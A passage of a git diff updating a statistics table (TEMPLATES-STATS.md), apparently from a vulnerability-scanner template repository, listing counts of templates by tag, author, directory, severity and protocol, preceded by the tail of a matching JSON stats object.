(mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"cocxanh","count":2},{"name":"0xsmiley","count":2},{"name":"zomsop82","count":2},{"name":"fabaff","count":2},{"name":"udit_thakkur","count":2},{"name":"huowuzhao","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"lotusdll","count":2},{"name":"alifathi-h1","count":2},{"name":"koti2","count":2},{"name":"moritz nentwig","count":2},{"name":"pxmme1337","count":2},{"name":"nkxxkn","count":2},{"name":"w4cky_","count":2},{"name":"parth","count":2},{"name":"convisoappsec","count":2},{"name":"joeldeleep","count":2},{"name":"randomrobbie","count":2},{"name":"amsda","count":2},{"name":"un-fmunozs","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"0h1in9e","count":1},{"name":"nerrorsec","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"regala_","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"push4d","count":1},{"name":"taielab","count":1},{"name":"adrianmf","count":1},{"name":"d0rkerdevil","count":1},{"name":"defr0ggy","count":1},{"name":"deena","count":1},{"name":"zhenwarx","count":1},{"name":"knassar702","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"bolli95","count":1},{"name":"bad5ect0r","count":1},{"name":"whynotke","count":1},{"name":"streetofhackerr007","count":1},{"name":"alperenkesk","count":1},{"name":"_darrenmartyn","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ooooooo_q","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ilovebinbash","count":1},{"name":"xstp","count":1},{"name":"geraldino2","count":1},{"name":"x6263","count":1},{"name":"willd96","count":1},{"name":"petruknisme","count":1},{"name":"mah3sec_","count":1},{"name":"s1r1u5_","count":1},{"name":"thezakman","count":1},{"name":"vzamanillo","count":1},{"name":"rojanrijal","count":1},{"name":"52971","count":1},{"name":"sec_hawk","count":1},{"name":"shifacyclewla","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"_harleo","count":1},{"name":"zandros0","count":1},{"name":"me9187","count":1},{"name":"becivells","count":1},{"name":"alex","count":1},{"name":"andirrahmani1","count":1},{"name":"pudsec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"pdp","count":1},{"name":"yavolo","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"noamrathaus","count":1},{"name":"forgedhallpass","count":1},{"name":"naglinagli","count":1},{"name":"ajaysenr","count":1},{"name":"borna nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"@dwisiswant0","count":1},{"name":"daviey","count":1},{"name":"rodnt","count":1},{"name":"kareemse1im","count":1},{"name":"luskabol","count":1},{"name":"affix","count":1},{"name":"elder tao","count":1},{"name":"shreyapohekar","count":1},{"name":"brabbit10","count":1},{"name":"mhdsamx","count":1},{"name":"gboddin","count":1},{"name":"qlkwej","count":1},{"name":"manuelbua","count":1},{"name":"ringo","count":1},{"name":"absshax","count":1},{"name":"furkansenan","count":1},{"name":"infosecsanyam","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"0xrod","count":1},{"name":"izn0u","count":1},{"name":"smaranchand","count":1},{"name":"notsoevilweasel","count":1},{"name":"flag007","count":1},{"name":"undefl0w","count":1},{"name":"hanlaomo","count":1},{"name":"cookiehanhoan","count":1},{"name":"shelld3v","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"tirtha_mandal","count":1},{"name":"toufik airane","count":1},{"name":"ahmed sherif","count":1},{"name":"sickwell","count":1},{"name":"sshell","count":1},{"name":"tim_koopmans","count":1},{"name":"sullo","count":1},{"name":"jteles","count":1},{"name":"alph4byt3","count":1},{"name":"b0yd","count":1},{"name":"ipanda","count":1},{"name":"its0x08","count":1},{"name":"remonsec","count":1},{"name":"sicksec","count":1},{"name":"exploitation","count":1},{"name":"j33n1k4","count":1},{"name":"omarkurt","count":1},{"name":"_c0wb0y_","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"fopina","count":1},{"name":"luci","count":1},{"name":"patralos","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"philippdelteil","count":1},{"name":"akash.c","count":1},{"name":"oscarintherocks","count":1},{"name":"mubassirpatel","count":1},{"name":"rotemreiss","count":1},{"name":"soyelmago","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"elmahdi","count":1},{"name":"yashgoti","count":1},{"name":"yashanand155","count":1},{"name":"0xtavian","count":1},{"name":"pratik khalane","count":1},{"name":"akshansh","count":1},{"name":"ahmetpergamum","count":1},{"name":"kre80r","count":1},{"name":"elouhi","count":1},{"name":"b0rn2r00t","count":1},{"name":"0xteles","count":1},{"name":"mesaglio","count":1},{"name":"ldionmarcil","count":1},{"name":"jeya seelan","count":1},{"name":"raesene","count":1},{"name":"revblock","count":1},{"name":"andysvints","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"evolutionsec","count":1},{"name":"juicypotato1","count":1},{"name":"divya_mudgal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"kabirsuda","count":1},{"name":"dawid-czarnecki","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aresx","count":1},{"name":"apt-mirror","count":1},{"name":"mass0ma","count":1},{"name":"makyotox","count":1},{"name":"micha3lb3n","count":1},{"name":"thevillagehacker","count":1},{"name":"schniggie","count":1},{"name":"iampritam","count":1},{"name":"sy3omda","count":1}],"directory":[{"name":"cves","count":804},{"name":"vulnerabilities","count":311},{"name":"exposed-panels","count":250},{"name":"technologies","count":200},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":34},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":661},{"name":"high","count":621},{"name":"medium","count":463},{"name":"critical","count":275},{"name":"low","count":154}],"types":[{"name":"http","count":2068},{"name":"file","count":46},{"name":"network","count":43},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 517ec10c3f..8dbda1cd09 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,825 +1,830 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 739 | pikpikcu | 273 | cves | 739 | info | 650 | http | 1991 | -| lfi | 266 | dhiyaneshdk | 268 | vulnerabilities | 307 | high | 560 | file | 46 | -| panel | 252 | daffainfo | 217 | exposed-panels | 250 | medium | 456 | network | 42 | -| xss | 248 | pdteam | 195 | technologies | 192 | critical | 276 | dns | 12 | -| wordpress | 235 | geeknik | 154 | exposures | 188 | low | 154 | | | +| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | +| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | +| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | +| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 200 | gy741 | 76 | takeovers | 64 | | | | | -| tech | 183 | pussycat0x | 69 | default-logins | 56 | | | | | -| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 161 | madrobot | 61 | workflows | 37 | | | | | -| cve2021 | 138 | 0x_akoko | 43 | network | 33 | | | | | -| cve2019 | 96 | gaurang | 42 | iot | 25 | | | | | -| config | 94 | philippedelteil | 27 | miscellaneous | 24 | | | | | -| cve2018 | 86 | ice3man | 26 | dns | 12 | | | | | -| joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | -| apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | -| cve2010 | 69 | pr3r00t | 14 | headless | 5 | | | | | -| takeover | 68 | milo2012 | 14 | | | | | | | +| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | +| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | +| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | +| cve2021 | 139 | 0x_akoko | 43 | network | 34 | | | | | +| joomla | 128 | gaurang | 42 | iot | 25 | | | | | +| cve2010 | 108 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| cve2019 | 97 | ice3man | 26 | dns | 12 | | | | | +| config | 94 | organiccrap | 24 | fuzzing | 10 | | | | | +| cve2018 | 86 | sheikhrishad | 15 | cnvd | 9 | | | | | +| apache | 70 | milo2012 | 14 | headless | 5 | | | | | +| takeover | 68 | pr3r00t | 14 | | | | | | | | iot | 66 | techbrunchfr | 13 | | | | | | | | token | 65 | suman_kar | 12 | | | | | | | -| default-login | 63 | r3dg33k | 11 | | | | | | | -| oob | 55 | cyllective | 11 | | | | | | | -| cve2017 | 50 | random_robbie | 10 | | | | | | | +| default-login | 64 | cyllective | 11 | | | | | | | +| oob | 57 | r3dg33k | 11 | | | | | | | +| cve2017 | 50 | righettod | 10 | | | | | | | | unauth | 47 | wdahlenb | 10 | | | | | | | -| file | 46 | righettod | 10 | | | | | | | -| network | 42 | hackergautam | 9 | | | | | | | -| sqli | 38 | nadino | 9 | | | | | | | -| ssrf | 37 | melbadry9 | 9 | | | | | | | -| | 37 | that_juan_ | 8 | | | | | | | -| oracle | 36 | aashiq | 8 | | | | | | | -| cve2016 | 36 | iamthefrogy | 8 | | | | | | | -| redirect | 34 | dr_set | 7 | | | | | | | -| logs | 30 | techryptic (@tech) | 7 | | | | | | | -| jira | 28 | emadshanab | 7 | | | | | | | -| listing | 27 | harshbothra_ | 7 | | | | | | | -| atlassian | 27 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 24 | oppsec | 7 | | | | | | | -| misc | 23 | randomstr1ng | 7 | | | | | | | -| disclosure | 22 | meme-lord | 7 | | | | | | | -| auth-bypass | 21 | dogasantos | 7 | | | | | | | -| cisco | 20 | kophjager007 | 7 | | | | | | | -| generic | 20 | puzzlepeaches | 6 | | | | | | | -| aem | 19 | caspergn | 6 | | | | | | | -| cve2014 | 19 | __fazal | 6 | | | | | | | -| router | 19 | pentest_swissky | 6 | | | | | | | -| sap | 18 | logicalhunter | 6 | | | | | | | -| debug | 18 | ganofins | 5 | | | | | | | -| springboot | 18 | elsfa7110 | 5 | | | | | | | -| misconfig | 18 | panch0r3d | 5 | | | | | | | -| php | 16 | rootxharsh | 5 | | | | | | | -| login | 14 | joanbono | 5 | | | | | | | -| fuzz | 14 | iamnoooob | 5 | | | | | | | -| cve2011 | 14 | yanyun | 5 | | | | | | | -| weblogic | 14 | lu4nx | 4 | | | | | | | -| cve2012 | 14 | nodauf | 4 | | | | | | | +| file | 46 | random_robbie | 10 | | | | | | | +| network | 43 | nadino | 9 | | | | | | | +| ssrf | 40 | hackergautam | 9 | | | | | | | +| sqli | 38 | melbadry9 | 9 | | | | | | | +| | 37 | iamthefrogy | 8 | | | | | | | +| cve2016 | 36 | aashiq | 8 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| redirect | 34 | meme-lord | 7 | | | | | | | +| logs | 30 | harshbothra_ | 7 | | | | | | | +| jira | 28 | oppsec | 7 | | | | | | | +| cve2014 | 27 | emadshanab | 7 | | | | | | | +| atlassian | 27 | dogasantos | 7 | | | | | | | +| listing | 27 | dr_set | 7 | | | | | | | +| cve2015 | 26 | randomstr1ng | 7 | | | | | | | +| generic | 23 | techryptic (@tech) | 7 | | | | | | | +| misc | 23 | kophjager007 | 7 | | | | | | | +| auth-bypass | 23 | 0x240x23elu | 7 | | | | | | | +| disclosure | 22 | caspergn | 6 | | | | | | | +| router | 20 | logicalhunter | 6 | | | | | | | +| aem | 19 | pentest_swissky | 6 | | | | | | | +| cisco | 19 | puzzlepeaches | 6 | | | | | | | +| debug | 18 | __fazal | 6 | | | | | | | +| springboot | 18 | rootxharsh | 5 | | | | | | | +| misconfig | 18 | elsfa7110 | 5 | | | | | | | +| sap | 18 | panch0r3d | 5 | | | | | | | +| cve2012 | 17 | yanyun | 5 | | | | | | | +| php | 16 | iamnoooob | 5 | | | | | | | +| cve2011 | 15 | ganofins | 5 | | | | | | | +| login | 14 | lu4nx | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | e_schultze_ | 4 | | | | | | | | struts | 14 | github.com/its0x08 | 4 | | | | | | | -| zoho | 13 | e_schultze_ | 4 | | | | | | | -| android | 13 | xelkomy | 4 | | | | | | | -| dns | 13 | emenalf | 3 | | | | | | | -| devops | 13 | sushantkamble | 3 | | | | | | | -| adobe | 13 | idealphase | 3 | | | | | | | -| aws | 12 | jarijaas | 3 | | | | | | | +| fuzz | 14 | nodauf | 4 | | | | | | | +| adobe | 13 | xelkomy | 4 | | | | | | | +| zoho | 13 | yash anand @yashanand155 | 3 | | | | | | | +| android | 13 | shine | 3 | | | | | | | +| dns | 13 | jarijaas | 3 | | | | | | | +| devops | 13 | _generic_human_ | 3 | | | | | | | +| jenkins | 12 | johnk3r | 3 | | | | | | | | manageengine | 12 | impramodsargar | 3 | | | | | | | -| jenkins | 12 | mavericknerd | 3 | | | | | | | -| dlink | 12 | vsh00t | 3 | | | | | | | -| wp-theme | 11 | incogbyte | 3 | | | | | | | -| cve2013 | 11 | binaryfigments | 3 | | | | | | | -| dell | 10 | z3bd | 3 | | | | | | | -| xxe | 10 | skeltavik | 3 | | | | | | | -| ftp | 9 | dudez | 3 | | | | | | | +| aws | 12 | skeltavik | 3 | | | | | | | +| dlink | 12 | unstabl3 | 3 | | | | | | | +| wp-theme | 11 | idealphase | 3 | | | | | | | +| cve2013 | 11 | sushantkamble | 3 | | | | | | | +| xxe | 10 | 0w4ys | 3 | | | | | | | +| dell | 10 | emenalf | 3 | | | | | | | +| ftp | 9 | fyoorer | 3 | | | | | | | | intrusive | 9 | thomas_from_offensity | 3 | | | | | | | -| magento | 9 | fyoorer | 3 | | | | | | | -| airflow | 8 | shifacyclewala | 3 | | | | | | | -| cnvd | 8 | johnk3r | 3 | | | | | | | -| vmware | 8 | _generic_human_ | 3 | | | | | | | -| rails | 8 | tess | 3 | | | | | | | -| nginx | 8 | 0w4ys | 3 | | | | | | | -| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| scada | 8 | shine | 3 | | | | | | | -| ruijie | 8 | unstabl3 | 3 | | | | | | | -| google | 7 | f1tz | 3 | | | | | | | -| coldfusion | 7 | arcc | 2 | | | | | | | -| cve2009 | 7 | whoever | 2 | | | | | | | -| netgear | 7 | hahwul | 2 | | | | | | | -| kubernetes | 7 | foulenzer | 2 | | | | | | | -| cms | 7 | gevakun | 2 | | | | | | | -| files | 7 | swissky | 2 | | | | | | | -| ibm | 7 | zomsop82 | 2 | | | | | | | -| backup | 7 | 0xsmiley | 2 | | | | | | | -| confluence | 7 | cocxanh | 2 | | | | | | | -| microsoft | 7 | hetroublemakr | 2 | | | | | | | -| laravel | 6 | parth | 2 | | | | | | | -| citrix | 6 | lotusdll | 2 | | | | | | | -| camera | 6 | amsda | 2 | | | | | | | -| rconfig | 6 | sullo | 2 | | | | | | | -| api | 6 | pxmme1337 | 2 | | | | | | | -| cve2008 | 6 | 0xrudra | 2 | | | | | | | -| django | 6 | 0xsapra | 2 | | | | | | | -| solr | 6 | bsysop | 2 | | | | | | | -| docker | 6 | koti2 | 2 | | | | | | | -| jetty | 6 | manas_harsh | 2 | | | | | | | -| dedecms | 5 | mohammedsaneem | 2 | | | | | | | -| hp | 5 | davidmckennirey | 2 | | | | | | | -| jolokia | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| lucee | 5 | udit_thakkur | 2 | | | | | | | -| nodejs | 5 | r3naissance | 2 | | | | | | | -| printer | 5 | random-robbie | 2 | | | | | | | -| fileupload | 5 | kiblyn11 | 2 | | | | | | | -| phpmyadmin | 5 | moritz nentwig | 2 | | | | | | | -| deserialization | 5 | vavkamil | 2 | | | | | | | -| headless | 5 | g4l1t0 | 2 | | | | | | | -| tomcat | 5 | fabaff | 2 | | | | | | | -| drupal | 5 | 0xelkomy | 2 | | | | | | | -| windows | 5 | ree4pwn | 2 | | | | | | | -| java | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | socketz | 2 | | | | | | | -| circarlife | 5 | joeldeleep | 2 | | | | | | | -| ssti | 5 | x1m_martijn | 2 | | | | | | | -| exchange | 4 | convisoappsec | 2 | | | | | | | -| glpi | 4 | 0xprial | 2 | | | | | | | -| traversal | 4 | randomrobbie | 2 | | | | | | | -| magmi | 4 | alifathi-h1 | 2 | | | | | | | -| moodle | 4 | bernardofsr | 2 | | | | | | | -| vpn | 4 | johnjhacking | 2 | | | | | | | -| strapi | 4 | huowuzhao | 2 | | | | | | | -| zabbix | 4 | dheerajmadhukar | 2 | | | | | | | -| git | 4 | nkxxkn | 2 | | | | | | | -| thinkphp | 4 | w4cky_ | 2 | | | | | | | -| zimbra | 4 | bing0o | 2 | | | | | | | -| thinkcmf | 4 | ehsahil | 2 | | | | | | | -| rfi | 4 | 0xcrypto | 2 | | | | | | | -| resin | 4 | gal nagli | 2 | | | | | | | -| webserver | 4 | afaq | 2 | | | | | | | -| wso2 | 4 | kabirsuda | 1 | | | | | | | -| symantec | 4 | pratik khalane | 1 | | | | | | | -| symfony | 4 | flag007 | 1 | | | | | | | -| buffalo | 4 | retr0 | 1 | | | | | | | -| proxy | 4 | whynotke | 1 | | | | | | | -| hongdian | 4 | yavolo | 1 | | | | | | | -| solarwinds | 4 | ahmed sherif | 1 | | | | | | | -| samsung | 4 | ratnadip gajbhiye | 1 | | | | | | | -| elastic | 4 | omarkurt | 1 | | | | | | | -| crlf | 4 | kba@sogeti_esec | 1 | | | | | | | -| artifactory | 4 | mass0ma | 1 | | | | | | | -| firmware | 4 | d0rkerdevil | 1 | | | | | | | -| asp | 4 | sec_hawk | 1 | | | | | | | -| grafana | 4 | 0xteles | 1 | | | | | | | -| druid | 3 | luskabol | 1 | | | | | | | -| ssh | 3 | tirtha_mandal | 1 | | | | | | | -| lfr | 3 | divya_mudgal | 1 | | | | | | | -| microstrategy | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| cacti | 3 | taielab | 1 | | | | | | | -| bitrix | 3 | un-fmunozs | 1 | | | | | | | -| targa | 3 | adrianmf | 1 | | | | | | | -| smtp | 3 | aceseven (digisec360) | 1 | | | | | | | -| jeesns | 3 | aresx | 1 | | | | | | | -| zhiyuan | 3 | streetofhackerr007 | 1 | | | | | | | -| nacos | 3 | hanlaomo | 1 | | | | | | | -| kafka | 3 | bad5ect0r | 1 | | | | | | | -| oa | 3 | _darrenmartyn | 1 | | | | | | | -| injection | 3 | j33n1k4 | 1 | | | | | | | -| fpd | 3 | thezakman | 1 | | | | | | | -| springcloud | 3 | 0xtavian | 1 | | | | | | | -| fanruan | 3 | c3l3si4n | 1 | | | | | | | -| vbulletin | 3 | mah3sec_ | 1 | | | | | | | -| bigip | 3 | apt-mirror | 1 | | | | | | | -| slack | 3 | petruknisme | 1 | | | | | | | -| caucho | 3 | elder tao | 1 | | | | | | | -| jellyfin | 3 | rodnt | 1 | | | | | | | -| openam | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| ebs | 3 | qlkwej | 1 | | | | | | | -| kevinlab | 3 | defr0ggy | 1 | | | | | | | -| opensis | 3 | akshansh | 1 | | | | | | | -| tikiwiki | 3 | iampritam | 1 | | | | | | | -| terramaster | 3 | willd96 | 1 | | | | | | | -| linkerd | 3 | raesene | 1 | | | | | | | -| telerik | 3 | x6263 | 1 | | | | | | | -| azure | 3 | exploitation | 1 | | | | | | | -| nosqli | 3 | elmahdi | 1 | | | | | | | -| nexus | 3 | co0nan | 1 | | | | | | | -| mail | 3 | fopina | 1 | | | | | | | -| amazon | 3 | 52971 | 1 | | | | | | | -| kibana | 3 | nytr0gen | 1 | | | | | | | -| npm | 3 | th3.d1p4k | 1 | | | | | | | -| mongodb | 3 | zhenwarx | 1 | | | | | | | -| itop | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| ofbiz | 3 | fmunozs | 1 | | | | | | | -| httpd | 3 | kareemse1im | 1 | | | | | | | -| backups | 3 | mubassirpatel | 1 | | | | | | | -| firebase | 3 | hakluke | 1 | | | | | | | -| r-seenet | 3 | wabafet | 1 | | | | | | | -| log | 3 | its0x08 | 1 | | | | | | | -| prometheus | 3 | 0h1in9e | 1 | | | | | | | -| hoteldruid | 3 | vzamanillo | 1 | | | | | | | -| openssh | 3 | affix | 1 | | | | | | | -| commax | 2 | smaranchand | 1 | | | | | | | -| akamai | 2 | knassar702 | 1 | | | | | | | -| qcubed | 2 | kurohost | 1 | | | | | | | -| waf | 2 | infosecsanyam | 1 | | | | | | | -| bruteforce | 2 | mhdsamx | 1 | | | | | | | -| flir | 2 | b0rn2r00t | 1 | | | | | | | -| chamilo | 2 | deena | 1 | | | | | | | -| bucket | 2 | yashgoti | 1 | | | | | | | -| getsimple | 2 | akash.c | 1 | | | | | | | -| ecology | 2 | luci | 1 | | | | | | | -| horde | 2 | borna nematzadeh | 1 | | | | | | | -| spark | 2 | undefl0w | 1 | | | | | | | -| ec2 | 2 | _c0wb0y_ | 1 | | | | | | | -| leak | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| grav | 2 | ooooooo_q | 1 | | | | | | | -| service | 2 | evolutionsec | 1 | | | | | | | -| kong | 2 | shelld3v | 1 | | | | | | | -| seeyon | 2 | juicypotato1 | 1 | | | | | | | -| netsweeper | 2 | sicksec | 1 | | | | | | | -| axis | 2 | push4d | 1 | | | | | | | -| wordfence | 2 | sshell | 1 | | | | | | | -| nextjs | 2 | ringo | 1 | | | | | | | -| splunk | 2 | s1r1u5_ | 1 | | | | | | | -| glassfish | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| keycloak | 2 | notsoevilweasel | 1 | | | | | | | -| yapi | 2 | micha3lb3n | 1 | | | | | | | -| couchdb | 2 | nerrorsec | 1 | | | | | | | -| nextcloud | 2 | naglinagli | 1 | | | | | | | -| adminer | 2 | 0ut0fb4nd | 1 | | | | | | | -| geowebserver | 2 | ilovebinbash | 1 | | | | | | | -| rstudio | 2 | geraldino2 | 1 | | | | | | | -| idrac | 2 | manuelbua | 1 | | | | | | | -| bypass | 2 | zandros0 | 1 | | | | | | | -| github | 2 | revblock | 1 | | | | | | | -| odoo | 2 | jeya seelan | 1 | | | | | | | -| maian | 2 | alperenkesk | 1 | | | | | | | -| smb | 2 | toufik airane | 1 | | | | | | | -| pega | 2 | rotemreiss | 1 | | | | | | | -| fortios | 2 | sickwell | 1 | | | | | | | -| harbor | 2 | cookiehanhoan | 1 | | | | | | | -| cache | 2 | udyz | 1 | | | | | | | -| huawei | 2 | oscarintherocks | 1 | | | | | | | -| sonarqube | 2 | berkdusunur | 1 | | | | | | | -| sonicwall | 2 | ohlinge | 1 | | | | | | | -| jeedom | 2 | gboddin | 1 | | | | | | | -| frp | 2 | _harleo | 1 | | | | | | | -| backdoor | 2 | alph4byt3 | 1 | | | | | | | -| openfire | 2 | alex | 1 | | | | | | | -| icewarp | 2 | @dwisiswant0 | 1 | | | | | | | -| hostheader-injection | 2 | tim_koopmans | 1 | | | | | | | -| ucmdb | 2 | ajaysenr | 1 | | | | | | | -| sharepoint | 2 | me9187 | 1 | | | | | | | -| dolibarr | 2 | thevillagehacker | 1 | | | | | | | -| emerge | 2 | bolli95 | 1 | | | | | | | -| paloalto | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| node | 2 | intx0x80 | 1 | | | | | | | -| ecoa | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| dos | 2 | @github.com/defr0ggy | 1 | | | | | | | -| voipmonitor | 2 | bjhulst | 1 | | | | | | | -| vrealize | 2 | patralos | 1 | | | | | | | -| wuzhicms | 2 | blckraven | 1 | | | | | | | -| totemomail | 2 | schniggie | 1 | | | | | | | -| openvpn | 2 | b4uh0lz | 1 | | | | | | | -| storage | 2 | andysvints | 1 | | | | | | | -| hashicorp | 2 | becivells | 1 | | | | | | | -| linux | 2 | bernardo rodrigues | 1 | | | | | | | +| magento | 9 | shifacyclewala | 3 | | | | | | | +| vmware | 9 | binaryfigments | 3 | | | | | | | +| ruijie | 8 | mavericknerd | 3 | | | | | | | +| rails | 8 | vsh00t | 3 | | | | | | | +| airflow | 8 | z3bd | 3 | | | | | | | +| scada | 8 | tess | 3 | | | | | | | +| nginx | 8 | f1tz | 3 | | | | | | | +| cve2008 | 8 | incogbyte | 3 | | | | | | | +| cnvd | 8 | dudez | 3 | | | | | | | +| gitlab | 8 | foulenzer | 2 | | | | | | | +| files | 7 | koti2 | 2 | | | | | | | +| microsoft | 7 | 0xelkomy | 2 | | | | | | | +| cms | 7 | mohammedsaneem | 2 | | | | | | | +| netgear | 7 | fabaff | 2 | | | | | | | +| confluence | 7 | gal nagli | 2 | | | | | | | +| google | 7 | afaq | 2 | | | | | | | +| coldfusion | 7 | vavkamil | 2 | | | | | | | +| kubernetes | 7 | kiblyn11 | 2 | | | | | | | +| ibm | 7 | huowuzhao | 2 | | | | | | | +| backup | 7 | dheerajmadhukar | 2 | | | | | | | +| solr | 6 | hetroublemakr | 2 | | | | | | | +| laravel | 6 | alifathi-h1 | 2 | | | | | | | +| jetty | 6 | 0xprial | 2 | | | | | | | +| docker | 6 | convisoappsec | 2 | | | | | | | +| rconfig | 6 | zomsop82 | 2 | | | | | | | +| citrix | 6 | w4cky_ | 2 | | | | | | | +| api | 6 | gevakun | 2 | | | | | | | +| hp | 6 | cocxanh | 2 | | | | | | | +| camera | 6 | arcc | 2 | | | | | | | +| django | 6 | joeldeleep | 2 | | | | | | | +| fileupload | 5 | udit_thakkur | 2 | | | | | | | +| headless | 5 | pxmme1337 | 2 | | | | | | | +| dedecms | 5 | 0xrudra | 2 | | | | | | | +| nodejs | 5 | bp0lr | 2 | | | | | | | +| circarlife | 5 | whoever | 2 | | | | | | | +| printer | 5 | amsda | 2 | | | | | | | +| iis | 5 | 0xsmiley | 2 | | | | | | | +| drupal | 5 | g4l1t0 | 2 | | | | | | | +| ssti | 5 | randomrobbie | 2 | | | | | | | +| lucee | 5 | 0xsapra | 2 | | | | | | | +| phpmyadmin | 5 | random-robbie | 2 | | | | | | | +| deserialization | 5 | socketz | 2 | | | | | | | +| jolokia | 5 | bing0o | 2 | | | | | | | +| tomcat | 5 | r3naissance | 2 | | | | | | | +| java | 5 | johnjhacking | 2 | | | | | | | +| windows | 5 | manas_harsh | 2 | | | | | | | +| webserver | 4 | ehsahil | 2 | | | | | | | +| thinkphp | 4 | ree4pwn | 2 | | | | | | | +| zimbra | 4 | swissky | 2 | | | | | | | +| symfony | 4 | moritz nentwig | 2 | | | | | | | +| rfi | 4 | nkxxkn | 2 | | | | | | | +| artifactory | 4 | 0xcrypto | 2 | | | | | | | +| hongdian | 4 | bernardofsr | 2 | | | | | | | +| git | 4 | hahwul | 2 | | | | | | | +| exchange | 4 | bsysop | 2 | | | | | | | +| thinkcmf | 4 | parth | 2 | | | | | | | +| buffalo | 4 | lotusdll | 2 | | | | | | | +| vpn | 4 | davidmckennirey | 2 | | | | | | | +| wso2 | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| glpi | 4 | x1m_martijn | 2 | | | | | | | +| grafana | 4 | 0h1in9e | 1 | | | | | | | +| resin | 4 | 0ut0fb4nd | 1 | | | | | | | +| strapi | 4 | ahmed sherif | 1 | | | | | | | +| proxy | 4 | philippdelteil | 1 | | | | | | | +| elastic | 4 | geraldino2 | 1 | | | | | | | +| crlf | 4 | sullo | 1 | | | | | | | +| traversal | 4 | _darrenmartyn | 1 | | | | | | | +| samsung | 4 | me9187 | 1 | | | | | | | +| solarwinds | 4 | push4d | 1 | | | | | | | +| zabbix | 4 | hakluke | 1 | | | | | | | +| symantec | 4 | sicksec | 1 | | | | | | | +| magmi | 4 | rojanrijal | 1 | | | | | | | +| asp | 4 | un-fmunozs | 1 | | | | | | | +| fatpipe | 4 | willd96 | 1 | | | | | | | +| moodle | 4 | ohlinge | 1 | | | | | | | +| firmware | 4 | noamrathaus | 1 | | | | | | | +| npm | 3 | bjhulst | 1 | | | | | | | +| fanruan | 3 | knassar702 | 1 | | | | | | | +| itop | 3 | nytr0gen | 1 | | | | | | | +| zhiyuan | 3 | kurohost | 1 | | | | | | | +| httpd | 3 | remonsec | 1 | | | | | | | +| r-seenet | 3 | furkansenan | 1 | | | | | | | +| linkerd | 3 | 0xtavian | 1 | | | | | | | +| lfr | 3 | thevillagehacker | 1 | | | | | | | +| openssh | 3 | wabafet | 1 | | | | | | | +| nexus | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| hasura | 2 | makyotox | 1 | | | | | | | -| jsf | 2 | yashanand155 | 1 | | | | | | | -| jboss | 2 | 0xrod | 1 | | | | | | | -| netis | 2 | remonsec | 1 | | | | | | | -| axis2 | 2 | 